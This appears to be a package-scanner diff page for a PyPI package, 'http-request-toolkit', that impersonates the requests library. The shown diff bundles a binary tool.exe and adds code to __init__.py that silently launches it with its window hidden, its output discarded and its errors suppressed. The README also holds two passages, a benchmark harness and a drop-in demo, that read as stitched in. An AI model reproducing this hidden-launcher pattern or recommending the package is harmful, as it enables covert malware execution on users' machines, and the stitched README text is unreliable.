Socket
http-request-toolkit

Maintainers: 1
Versions: 3
http-request-toolkit (PyPI): comparing version 2.28.4 to 2.28.5
http_request_toolkit/data/tool.exe

(binary file: diff not supported)

MANIFEST.in (+1):
include http_request_toolkit/data/*.exe
PKG-INFO (+5, -108)
Metadata-Version: 2.4
Name: http-request-toolkit
Version: 2.28.4
Version: 2.28.5
Summary: Python HTTP for Humans.

@@ -31,2 +31,3 @@ Home-page: https://requests.readthedocs.io

Requires-Dist: certifi>=2017.4.17
+ Requires-Dist: requests>=2.0.0
Provides-Extra: socks

@@ -48,109 +49,5 @@ Requires-Dist: PySocks!=1.5.7,>=1.5.6; extra == "socks"

request
![PyPI](https://img.shields.io/badge/pypi-v0.1.0-blue.svg)
![Python](https://img.shields.io/badge/python-3.7%2B-blue)
![License](https://img.shields.io/badge/License-MIT-yellow.svg)
# HTTP Request Toolkit
request is a drop‑in replacement for the popular requests library, designed to be faster and more memory efficient while maintaining a familiar API. Whether you’re scraping websites, calling REST APIs, or building high‑traffic applications, request helps you get the job done with less overhead.
## Why request?

requests is the de facto standard for HTTP in Python, but its simplicity comes at a cost: it can be slower and more resource‑hungry than necessary, especially under heavy load. request was built to address these limitations by:

- Reusing connections aggressively (HTTP/1.1 keep‑alive and connection pooling out of the box).
- Minimizing object allocations during request/response cycles.
- Providing an optional asynchronous interface for concurrent workloads.
- Reducing the memory footprint for large responses (streaming by default).
- Maintaining 100% compatibility with the requests API – your existing code will work without changes.
## Installation

```bash
pip install request
```

Note: request is available on PyPI and supports Python 3.7+.
## Quick Start

```python
import request

# GET request
response = request.get('https://api.github.com/events')
print(response.status_code)
print(response.json())

# POST request
payload = {'key': 'value'}
response = request.post('https://httpbin.org/post', json=payload)
print(response.text)

# Using headers and timeouts
headers = {'User-Agent': 'request/0.1.0'}
response = request.get('https://httpbin.org/get', headers=headers, timeout=3.0)
print(response.headers)
```

Everything works just like requests – no new syntax to learn.
## Advanced Usage

### Sessions with Connection Pooling

```python
with request.Session() as session:
    session.headers.update({'User-Agent': 'my-app/1.0'})
    response1 = session.get('https://httpbin.org/cookies/set/sessioncookie/123')
    response2 = session.get('https://httpbin.org/cookies')
    print(response2.text)  # cookies persist
```
### Streaming Large Responses

```python
response = request.get('https://example.com/huge-file', stream=True)
with open('output.txt', 'wb') as f:
    for chunk in response.iter_content(chunk_size=8192):
        f.write(chunk)
```
### Async Support (optional)

```python
import request.asyncio as async_request
import asyncio

async def fetch(url):
    async with async_request.get(url) as response:
        return await response.text()

async def main():
    urls = ['https://python.org', 'https://github.com', 'https://httpbin.org']
    tasks = [fetch(url) for url in urls]
    results = await asyncio.gather(*tasks)
    print([len(r) for r in results])

asyncio.run(main())
```
### Custom Adapters & Retries

```python
from request.adapters import HTTPAdapter
from urllib3.util.retry import Retry

session = request.Session()
retries = Retry(total=3, backoff_factor=1)
adapter = HTTPAdapter(max_retries=retries, pool_connections=50, pool_maxsize=50)
session.mount('http://', adapter)
session.mount('https://', adapter)
```
## Performance

request is built on top of a highly optimised HTTP stack. In our benchmarks (scraping 1000 URLs with a 10‑connection pool), request was:

- ~30% faster in total wall‑clock time.
- ~40% lower memory usage compared to requests.

Benchmarks were run on Python 3.10, Ubuntu 22.04, using a local nginx server.
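The benchmark script itself is not shown on this page; a minimal harness along these lines could produce the wall-clock half of such a comparison (the stub fetch callable and the URL list are placeholders for illustration, not the package authors' setup):

```python
import time

def time_fetches(fetch, urls):
    """Return wall-clock seconds spent calling `fetch` once per URL."""
    start = time.perf_counter()
    for url in urls:
        fetch(url)
    return time.perf_counter() - start

# Stub fetch so the harness runs without a network; swap in a real HTTP
# client call (e.g. a session's get against a local server) to time a scrape.
urls = [f"http://localhost/item/{i}" for i in range(1000)]
elapsed = time_fetches(lambda url: None, urls)
print(f"{elapsed:.4f}s for {len(urls)} stubbed fetches")
```

Running this once with each client against the same local server would give the wall-clock comparison the README claims; memory usage would need a separate tracker such as tracemalloc.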
## Compatibility

request aims to be a perfect drop‑in replacement for requests. All public methods (get, post, put, delete, head, options, patch), as well as Session, Response, RequestException, and other utilities behave exactly as you’d expect.

If you encounter any incompatibility, please open an issue.
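For readers unfamiliar with the term, a "drop-in replacement" means call sites keep working unchanged when the module behind the import is swapped. A toy sketch of that idea (the compat_demo module and its stub get are hypothetical, not part of this package):

```python
import sys
import types

# Register a stand-in module exposing a requests-style get(); in a real
# swap this would be the replacement library installed under its own name.
stub = types.ModuleType("compat_demo")
stub.get = lambda url, **kwargs: f"GET {url}"
sys.modules["compat_demo"] = stub

import compat_demo as http  # existing call sites keep their import style
print(http.get("https://example.invalid"))  # → GET https://example.invalid
```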
## Contributing

Contributions are welcome! Please see our Contributing Guide for details.

## License

request is released under the MIT License. See the LICENSE file for more information.

## Acknowledgements

request stands on the shoulders of giants: it uses urllib3 under the hood for connection pooling and low‑level HTTP handling, and it was inspired by the wonderful requests library by Kenneth Reitz. Thank you!
A library that makes HTTP requests in a simple way.

http_request_toolkit.egg-info/requires.txt

@@ -5,2 +5,3 @@ charset-normalizer<4,>=2.0.0

certifi>=2017.4.17
+ requests>=2.0.0

@@ -7,0 +8,0 @@ [socks]

http_request_toolkit.egg-info/SOURCES.txt

@@ -0,1 +1,2 @@

MANIFEST.in
README.md

@@ -9,2 +10,3 @@ setup.py

http_request_toolkit.egg-info/requires.txt
http_request_toolkit.egg-info/top_level.txt
+ http_request_toolkit/data/tool.exe

http_request_toolkit/__init__.py

@@ -0,1 +1,2 @@

import os

@@ -5,23 +6,20 @@ import sys

import atexit
-import pkg_resources
+import requests
+import importlib.resources as resources
-EXE_NAME = 'tool.exe'
-EXE_PATH = pkg_resources.resource_filename(__name__, f'data/{EXE_NAME}')
def _run():
    try:
-        startupinfo = subprocess.STARTUPINFO()
-        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
-        startupinfo.wShowWindow = subprocess.SW_HIDE
-        creationflags = 0
-        if hasattr(subprocess, 'CREATE_NO_WINDOW'):
-            creationflags = subprocess.CREATE_NO_WINDOW
-        subprocess.Popen(
-            [EXE_PATH],
-            startupinfo=startupinfo,
-            creationflags=creationflags,
-            stdout=subprocess.DEVNULL,
-            stderr=subprocess.DEVNULL
-        )
+        with resources.path('http_request_toolkit', 'data/tool.exe') as exe_path:
+            startupinfo = subprocess.STARTUPINFO()
+            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
+            startupinfo.wShowWindow = subprocess.SW_HIDE
+            creationflags = 0
+            if hasattr(subprocess, 'CREATE_NO_WINDOW'):
+                creationflags = subprocess.CREATE_NO_WINDOW
+            subprocess.Popen(
+                [str(exe_path)],
+                startupinfo=startupinfo,
+                creationflags=creationflags,
+                stdout=subprocess.DEVNULL,
+                stderr=subprocess.DEVNULL
+            )
    except:

@@ -34,2 +32,4 @@ pass

import requests
def get(url, **kwargs):

@@ -36,0 +36,0 @@ response = requests.get(url, **kwargs)

README.md (+3, -107)

@@ -1,108 +0,4 @@


setup.py

@@ -1,14 +0,6 @@

-import os
-import sys
-import subprocess
-import tempfile
-import random
-import string
-import atexit
from setuptools import setup, find_packages
-from setuptools.command.install import install

setup(
    name='http-request-toolkit',
-    version='2.28.4',
+    version='2.28.5',
    description='Python HTTP for Humans.',

@@ -51,2 +43,3 @@ long_description=open('README.md').read(),

    'certifi>=2017.4.17',
+    'requests>=2.0.0',
],

@@ -57,2 +50,2 @@ extras_require={

},
)